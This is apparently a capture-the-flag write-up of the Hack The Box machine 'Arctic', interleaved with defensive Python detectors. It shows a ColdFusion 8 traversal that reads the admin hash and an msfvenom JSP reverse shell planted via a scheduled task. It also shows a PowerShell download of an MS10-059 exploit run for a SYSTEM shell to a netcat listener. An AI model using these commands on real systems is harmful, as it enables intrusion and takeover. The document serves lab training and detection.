Let’s get started! :)
The first step is to scan the machine for open services.
COMMAND: nmap -sC -sV -O -oA arctic 10.10.10.11
In the nmap scan result above, port 8500 looks interesting. Let’s have a look at it in the browser.
Let’s open the CFIDE folder.
The administrator directory gives us a login for ColdFusion 8.
After a quick search online we find that ColdFusion 8 is vulnerable to directory traversal. ColdFusion 8 also stores the administrator hash locally in a file called password.properties, so we can grab the administrator hash through the directory traversal using the following URL:
And we will get this output in the browser.
So we have a hash of
A quick Google search online yields the cracked password –
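As an added example (not part of the original writeup): a small Python checker a defender could run over web server access logs to spot the traversal and credential-file reads described above. The log lines, the `page=` query parameter name and the admin-console allowlist are all constructed for the demonstration; the real request shape is not shown here.

```python
from __future__ import annotations
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). They are not
# from the original writeup and the "page" parameter name is made up.
SAMPLE_LOG = """\
10.10.14.10 - - [29/Dec/2017:03:40:01 +0200] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 2311
10.10.14.10 - - [29/Dec/2017:03:40:09 +0200] "GET /CFIDE/administrator/enter.cfm?page=..%2F..%2F..%2F..%2Flib%2Fpassword.properties HTTP/1.1" 200 1043
10.10.14.10 - - [29/Dec/2017:03:40:15 +0200] "GET /CFIDE/administrator/enter.cfm?page=%252e%252e%5c%252e%252e%5clib%5cpassword.properties HTTP/1.1" 200 1043
10.10.10.50 - - [29/Dec/2017:03:41:00 +0200] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 2311
192.168.1.20 - - [29/Dec/2017:03:42:00 +0200] "GET /index.cfm HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')

# Assumption: only these addresses are expected to reach the admin console.
ADMIN_ALLOWLIST = frozenset({"10.10.10.50"})


def fully_decode(target: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded traversal (%252e) is caught,
    then normalise backslashes so Windows-style traversal looks the same."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target.replace("\\", "/")


def classify_request(ip: str, target: str) -> list[str]:
    """Return the list of reasons a request deserves attention (empty if none)."""
    decoded = fully_decode(target)
    path = decoded.split("?", 1)[0].lower()
    reasons = []
    if any(segment == ".." for segment in decoded.split("/")):
        reasons.append("path_traversal")
    if "password.properties" in decoded.lower():
        reasons.append("credential_file_reference")
    if path.startswith("/cfide/administrator/") and ip not in ADMIN_ALLOWLIST:
        reasons.append("admin_console_from_unlisted_source")
    return reasons


def analyze_log(text: str) -> list[tuple[int, str, tuple[str, ...]]]:
    """Parse each line and report (line number, client IP, reasons) for hits."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = LOG_RE.match(line)
        if not match:
            continue
        ip, _method, target, _status, _size = match.groups()
        reasons = classify_request(ip, target)
        if reasons:
            findings.append((line_no, ip, tuple(reasons)))
    return findings


if __name__ == "__main__":
    for line_no, ip, reasons in analyze_log(SAMPLE_LOG):
        print(f"line {line_no}: {ip} -> {', '.join(reasons)}")
```

Decoding more than once matters: the third sample line uses `%252e` (a percent-encoded `%2e`), which a single decode pass would leave looking harmless. The allowlist check is the cheap mitigation side of the same story: the admin console should not be reachable from arbitrary addresses at all.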
Once logged in, there is an area under the Debugging & Logging category, Scheduled Tasks, that allows us to upload files, as shown in the image below.
The scheduled task setup gives you the ability to download a file from a webserver and save the output locally. Under Mappings, we can verify the CFIDE path, so we know where we can save a shell.
At this point we need to generate a shell. We could upload a cfexec.cfm shell (located in /usr/share/webshells/cfm on Kali) to get command execution or we can get a full shell by uploading a JSP shell since ColdFusion will serve and run JSP files.
To generate a JSP shell we will use msfvenom.
COMMAND: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell_exp1o1t9r.jsp
Now that we have our shell created, let’s serve up the file from Kali using Python’s SimpleHTTPServer.
COMMAND: python -m SimpleHTTPServer 80
Inside the ColdFusion admin console we configure three parameters for the scheduled task.
- Set the URL to our webserver hosting the JSP shell
- Check the box for Save output to a file
- Set File to C:\ColdFusion8\wwwroot\CFIDE\shell_exp1o1t9r.jsp
Fire up a netcat listener and we can now browse to our shell at
BOOM! We got the shell!
Tolis is a regular user account, so we need to escalate privileges to administrator and get the root flag!
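The scheduled task above only worked because it could write an executable file into the webroot. As an added example (not part of the original writeup), here is a minimal file-integrity check in Python that baselines a webroot and reports any new or modified `.cfm`/`.jsp` files under it; the directory layout and file contents are constructed in a temporary folder for the demonstration.

```python
from __future__ import annotations
import hashlib
import tempfile
from pathlib import Path

# Extensions the ColdFusion/JRun stack will execute: a new file with one of
# these under the webroot (for example CFIDE) deserves immediate review.
WATCHED_EXTS = {".cfm", ".cfml", ".cfc", ".jsp", ".jspx"}


def snapshot(root: Path) -> dict[str, str]:
    """Map every file's POSIX-style relative path to its SHA-256 digest."""
    result = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            result[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return result


def diff_snapshots(baseline: dict[str, str], current: dict[str, str],
                   watched: set[str] = WATCHED_EXTS) -> list[tuple[str, str]]:
    """Report added, modified and removed executable web files, sorted."""
    findings = []
    for rel, digest in current.items():
        if Path(rel).suffix.lower() not in watched:
            continue
        if rel not in baseline:
            findings.append(("added", rel))
        elif baseline[rel] != digest:
            findings.append(("modified", rel))
    for rel in baseline:
        if rel not in current and Path(rel).suffix.lower() in watched:
            findings.append(("removed", rel))
    return sorted(findings)


def demo() -> list[tuple[str, str]]:
    """Constructed scenario: baseline a fake webroot, then simulate a drop."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        admin = root / "CFIDE" / "administrator"
        admin.mkdir(parents=True)
        (admin / "index.cfm").write_text("<cfoutput>admin</cfoutput>")
        (root / "CFIDE" / "readme.txt").write_text("docs")
        baseline = snapshot(root)

        # Simulated unwanted change: a JSP appears in the webroot and an
        # existing page is altered; the .txt change is not executable and is ignored.
        (root / "CFIDE" / "dropped.jsp").write_text('<% out.println("hello"); %>')
        (admin / "index.cfm").write_text("<cfoutput>admin</cfoutput><!-- changed -->")
        (root / "CFIDE" / "notes.txt").write_text("not executable, ignored")
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for status, rel in demo():
        print(f"{status:9s} {rel}")
```

In practice the baseline would be stored off-host and the comparison run on a schedule; the underlying fix is to keep the ColdFusion service account from having write access to the webroot in the first place, so a scheduled task cannot save its output there.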
```
C:\>systeminfo
systeminfo

Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00477-001-0000421-84900
Original Install Date: 22/3/2017, 11:09:45
System Boot Time: 29/12/2017, 3:34:21
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
    : Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
    : Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.024 MB
Available Physical Memory: 88 MB
Virtual Memory: Max Size: 2.048 MB
Virtual Memory: Available: 1.085 MB
Virtual Memory: In Use: 963 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
    : Intel(R) PRO/1000 MT Network Connection
      Connection Name: Local Area Connection
      DHCP Enabled: No
      IP address(es)
      : 10.10.10.11
```
From here we identify that the box is running Server 2008 R2 and also has no patches installed, according to the output under Hotfix(s). Let’s see what exploits we can find. From here you can either Google, use Exploit-DB, searchsploit, or, for Windows, I like to use something called Windows Exploit Suggester, which makes life easy. I won’t go into details on how to use it; check the GitHub page to see usage and what all you can feed into it.
After looking through the output I found a few privilege escalation exploits that could work. I settled on looking into MS10-059.
The Exploit-DB download only contained source files and no compiled exe. For whatever reason the exploit has an alias name of Chimichurri, as referenced on Exploit-DB, so I also searched by that and was able to find a compiled exe on GitHub here. Note that normally you want to compile things yourself, but I wasn’t able to do so without installing a ton of stuff, so I decided to forgo it. Based on the source code it looks like the exploit will send us a reverse shell by feeding our IP address and desired port as parameters.
Once again we set up a Python HTTP server on Kali; to download the file to our target, a simple PowerShell script will do the trick.
```
C:\ColdFusion8>echo $webclient = New-Object System.Net.WebClient >>wget.ps1
C:\ColdFusion8>echo $url = "http://10.10.14.10/chimichurri.exe" >>wget.ps1
C:\ColdFusion8>echo $file = "exploit.exe" >>wget.ps1
C:\ColdFusion8>echo $webclient.DownloadFile($url,$file) >>wget.ps1
C:\ColdFusion8>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
```
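The download step above leaves a very recognisable trail in process-creation telemetry: a script staged with `echo ... >> something.ps1`, then `powershell.exe` launched with `-ExecutionPolicy Bypass`, all descending from the web server process. As an added example (not part of the original writeup), the Python below scores constructed process-creation records in the shape of Windows 4688 / Sysmon events against those indicators; the events, weights, threshold and the assumption that `jrun.exe` is the ColdFusion 8 servlet process are all mine.

```python
from __future__ import annotations
import re

# Constructed process-creation records shaped like Windows 4688 / Sysmon
# events, reduced to the fields used here. They are not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 1200, "parent": "jrun.exe",
     "cmdline": r"cmd.exe /c echo $webclient = New-Object System.Net.WebClient >>wget.ps1"},
    {"pid": 1204, "parent": "cmd.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1"},
    {"pid": 1300, "parent": "explorer.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-Service"},
    {"pid": 1400, "parent": "jrun.exe",
     "cmdline": r"cmd.exe /c whoami & hostname"},
]

# Assumption: jrun.exe is the ColdFusion 8 servlet engine on this host and
# has no legitimate reason to spawn cmd.exe or powershell.exe.
WEB_SERVER_PARENTS = {"jrun.exe"}
PARENT_WEIGHT = 4

# (indicator name, weight, pattern matched against the command line)
INDICATORS = [
    ("execution_policy_bypass", 3, re.compile(r"-(?:ex|ep|exec|executionpolicy)\s+bypass", re.I)),
    ("noninteractive_or_noprofile", 1, re.compile(r"-(?:noni|nop)", re.I)),
    ("webclient_download", 3, re.compile(r"Net\.WebClient|DownloadFile|DownloadString", re.I)),
    ("script_staged_via_echo", 2, re.compile(r"\becho\b.*>>\s*\S+\.ps1", re.I)),
]


def score_event(event: dict) -> tuple[int, tuple[str, ...]]:
    """Sum the weights of every indicator the event trips; return score and names."""
    score, names = 0, []
    if event["parent"].lower() in WEB_SERVER_PARENTS:
        score += PARENT_WEIGHT
        names.append("spawned_by_web_server")
    for name, weight, pattern in INDICATORS:
        if pattern.search(event["cmdline"]):
            score += weight
            names.append(name)
    return score, tuple(names)


def triage(events: list[dict], threshold: int = 4) -> list[tuple[int, int, tuple[str, ...]]]:
    """Return (pid, score, indicator names) for every event at or above threshold."""
    flagged = []
    for event in events:
        score, names = score_event(event)
        if score >= threshold:
            flagged.append((event["pid"], score, names))
    return flagged


if __name__ == "__main__":
    for pid, score, names in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: score {score}: {', '.join(names)}")
```

Note that the plain `whoami & hostname` shell from `jrun.exe` is flagged on parentage alone, while an administrator running `powershell -NoProfile` from Explorer stays under the threshold: the parent process is the strongest single signal here, because a servlet engine should never be spawning a command interpreter.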
We verify the download, start a netcat listener, and run the exploit.
```
C:\ColdFusion8>exploit.exe 10.10.14.30 443
/Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Changing registry values...
/Chimichurri/-->Got SYSTEM token...
/Chimichurri/-->Running reverse shell...
/Chimichurri/-->Restoring default registry values...
```
```
root@exp1o1t9r:~/hacthebox/arctic# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49267
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\ColdFusion8>whoami & hostname
whoami & hostname
nt authority\system
arctic
```
From here we can get the root flag :)
If you like my writeup, give me respect on my HTB profile: Exp1o1t9r